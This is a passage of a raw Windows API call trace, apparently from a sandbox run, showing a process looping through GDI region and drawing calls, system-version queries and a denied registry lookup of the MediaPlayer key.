[0087.548] DeleteObject (ho=0x460401d9) returned 1 [0087.548] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.548] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.548] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.548] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.548] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.548] BeginPath (hdc=0x0) returned 0 [0087.548] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.548] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.548] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.548] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.548] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.548] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.548] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.548] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.549] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x450401dc [0087.549] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x470401d9 [0087.549] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406fb [0087.549] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040704 [0087.549] CombineRgn (hrgnDst=0x30406fb, hrgnSrc1=0x450401dc, hrgnSrc2=0x470401d9, iMode=1) returned 1 [0087.549] CombineRgn (hrgnDst=0x5040704, hrgnSrc1=0x450401dc, hrgnSrc2=0x470401d9, iMode=4) returned 2 [0087.549] CreateSolidBrush (color=0xff) returned 0x61006fa [0087.549] CreateSolidBrush (color=0xff0000) returned 0x3100705 [0087.549] DeleteObject (ho=0x3100705) returned 1 [0087.549] DeleteObject (ho=0x470401d9) returned 1 [0087.549] DeleteObject (ho=0x450401dc) returned 1 [0087.549] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.549] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.549] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.549] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.549] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.549] BeginPath (hdc=0x0) returned 0 [0087.549] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.549] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.549] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.549] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.549] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.549] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.549] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.549] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.549] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x480401d9 [0087.549] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x460401dc [0087.549] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040706 [0087.549] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040707 [0087.549] CombineRgn (hrgnDst=0x5040706, hrgnSrc1=0x480401d9, hrgnSrc2=0x460401dc, iMode=1) returned 1 [0087.549] CombineRgn (hrgnDst=0x3040707, hrgnSrc1=0x480401d9, hrgnSrc2=0x460401dc, iMode=4) returned 2 [0087.549] CreateSolidBrush (color=0xff) returned 0x4100705 [0087.549] CreateSolidBrush (color=0xff0000) returned 0x5100708 [0087.549] DeleteObject (ho=0x5100708) returned 1 [0087.549] DeleteObject (ho=0x460401dc) returned 1 [0087.549] DeleteObject (ho=0x480401d9) returned 1 [0087.549] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.549] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.549] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.549] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.549] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.550] BeginPath (hdc=0x0) returned 0 [0087.550] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.550] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.550] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.550] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.550] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.550] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.550] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.550] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.550] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x470401dc [0087.550] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x490401d9 [0087.550] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040709 [0087.550] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x504070c [0087.550] CombineRgn (hrgnDst=0x3040709, hrgnSrc1=0x470401dc, hrgnSrc2=0x490401d9, iMode=1) returned 1 [0087.550] CombineRgn (hrgnDst=0x504070c, hrgnSrc1=0x470401dc, hrgnSrc2=0x490401d9, iMode=4) returned 2 [0087.550] CreateSolidBrush (color=0xff) returned 0x6100708 [0087.550] CreateSolidBrush (color=0xff0000) returned 0x310070d [0087.550] DeleteObject (ho=0x310070d) returned 1 [0087.550] DeleteObject (ho=0x490401d9) returned 1 [0087.550] DeleteObject (ho=0x470401dc) returned 1 [0087.550] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.550] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.550] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.550] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.550] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.550] BeginPath (hdc=0x0) returned 0 [0087.550] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.550] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.550] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.550] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.550] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.550] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.550] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.550] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.550] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4a0401d9 [0087.550] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x480401dc [0087.550] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040710 [0087.550] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040711 [0087.551] CombineRgn (hrgnDst=0x5040710, hrgnSrc1=0x4a0401d9, hrgnSrc2=0x480401dc, iMode=1) returned 1 [0087.551] CombineRgn (hrgnDst=0x3040711, hrgnSrc1=0x4a0401d9, hrgnSrc2=0x480401dc, iMode=4) returned 2 [0087.551] CreateSolidBrush (color=0xff) returned 0x410070d [0087.551] CreateSolidBrush (color=0xff0000) returned 0x510070a [0087.551] DeleteObject (ho=0x510070a) returned 1 [0087.551] DeleteObject (ho=0x480401dc) returned 1 [0087.551] DeleteObject (ho=0x4a0401d9) returned 1 [0087.551] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.551] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.551] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.551] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.551] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.551] BeginPath (hdc=0x0) returned 0 [0087.551] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.551] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.551] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.551] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.551] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.551] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.551] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.551] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.551] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x490401dc [0087.551] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4b0401d9 [0087.551] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x304070b [0087.551] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x504070e [0087.551] CombineRgn (hrgnDst=0x304070b, hrgnSrc1=0x490401dc, hrgnSrc2=0x4b0401d9, iMode=1) returned 1 [0087.551] CombineRgn (hrgnDst=0x504070e, hrgnSrc1=0x490401dc, hrgnSrc2=0x4b0401d9, iMode=4) returned 2 [0087.551] CreateSolidBrush (color=0xff) returned 0x610070a [0087.551] CreateSolidBrush (color=0xff0000) returned 0x310070f [0087.551] DeleteObject (ho=0x310070f) returned 1 [0087.551] DeleteObject (ho=0x4b0401d9) returned 1 [0087.551] DeleteObject (ho=0x490401dc) returned 1 [0087.551] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.551] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.551] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.551] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.551] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.551] BeginPath (hdc=0x0) returned 0 [0087.551] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.551] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.551] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.551] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.551] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.551] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.552] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.552] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.552] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4c0401d9 [0087.552] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4a0401dc [0087.552] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040712 [0087.552] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040713 [0087.552] CombineRgn (hrgnDst=0x5040712, hrgnSrc1=0x4c0401d9, hrgnSrc2=0x4a0401dc, iMode=1) returned 1 [0087.552] CombineRgn (hrgnDst=0x3040713, hrgnSrc1=0x4c0401d9, hrgnSrc2=0x4a0401dc, iMode=4) returned 2 [0087.552] CreateSolidBrush (color=0xff) returned 0x410070f [0087.552] CreateSolidBrush (color=0xff0000) returned 0x510071e [0087.552] DeleteObject (ho=0x510071e) returned 1 [0087.552] DeleteObject (ho=0x4a0401dc) returned 1 [0087.552] DeleteObject (ho=0x4c0401d9) returned 1 [0087.552] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.552] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.552] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.552] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.552] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.552] BeginPath (hdc=0x0) returned 0 [0087.552] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.552] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.552] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.552] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.552] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.552] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.552] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.552] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.552] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4b0401dc [0087.552] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4d0401d9 [0087.552] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x304071f [0087.552] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040722 [0087.552] CombineRgn (hrgnDst=0x304071f, hrgnSrc1=0x4b0401dc, hrgnSrc2=0x4d0401d9, iMode=1) returned 1 [0087.552] CombineRgn (hrgnDst=0x5040722, hrgnSrc1=0x4b0401dc, hrgnSrc2=0x4d0401d9, iMode=4) returned 2 [0087.552] CreateSolidBrush (color=0xff) returned 0x610071e [0087.552] CreateSolidBrush (color=0xff0000) returned 0x3100723 [0087.552] DeleteObject (ho=0x3100723) returned 1 [0087.552] DeleteObject (ho=0x4d0401d9) returned 1 [0087.553] DeleteObject (ho=0x4b0401dc) returned 1 [0087.553] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.553] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.553] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.553] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.553] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.553] BeginPath (hdc=0x0) returned 0 [0087.553] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.553] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.553] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.553] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.553] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.553] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.553] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.553] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.553] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4e0401d9 [0087.553] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4c0401dc [0087.553] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x504071a [0087.553] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x304071b [0087.553] CombineRgn (hrgnDst=0x504071a, hrgnSrc1=0x4e0401d9, hrgnSrc2=0x4c0401dc, iMode=1) returned 1 [0087.553] CombineRgn (hrgnDst=0x304071b, hrgnSrc1=0x4e0401d9, hrgnSrc2=0x4c0401dc, iMode=4) returned 2 [0087.553] CreateSolidBrush (color=0xff) returned 0x4100723 [0087.553] CreateSolidBrush (color=0xff0000) returned 0x510071c [0087.553] DeleteObject (ho=0x510071c) returned 1 [0087.553] DeleteObject (ho=0x4c0401dc) returned 1 [0087.553] DeleteObject (ho=0x4e0401d9) returned 1 [0087.553] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.553] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.553] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.553] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.553] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.553] BeginPath (hdc=0x0) returned 0 [0087.553] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.553] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.553] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.553] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.553] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.553] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.553] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.553] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.554] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4d0401dc [0087.554] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4f0401d9 [0087.554] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x304071d [0087.554] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040720 [0087.554] CombineRgn (hrgnDst=0x304071d, hrgnSrc1=0x4d0401dc, hrgnSrc2=0x4f0401d9, iMode=1) returned 1 [0087.554] CombineRgn (hrgnDst=0x5040720, hrgnSrc1=0x4d0401dc, hrgnSrc2=0x4f0401d9, iMode=4) returned 2 [0087.554] CreateSolidBrush (color=0xff) returned 0x610071c [0087.554] CreateSolidBrush (color=0xff0000) returned 0x3100721 [0087.554] DeleteObject (ho=0x3100721) returned 1 [0087.554] DeleteObject (ho=0x4f0401d9) returned 1 [0087.554] DeleteObject (ho=0x4d0401dc) returned 1 [0087.554] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.554] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.554] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.554] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.554] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.554] BeginPath 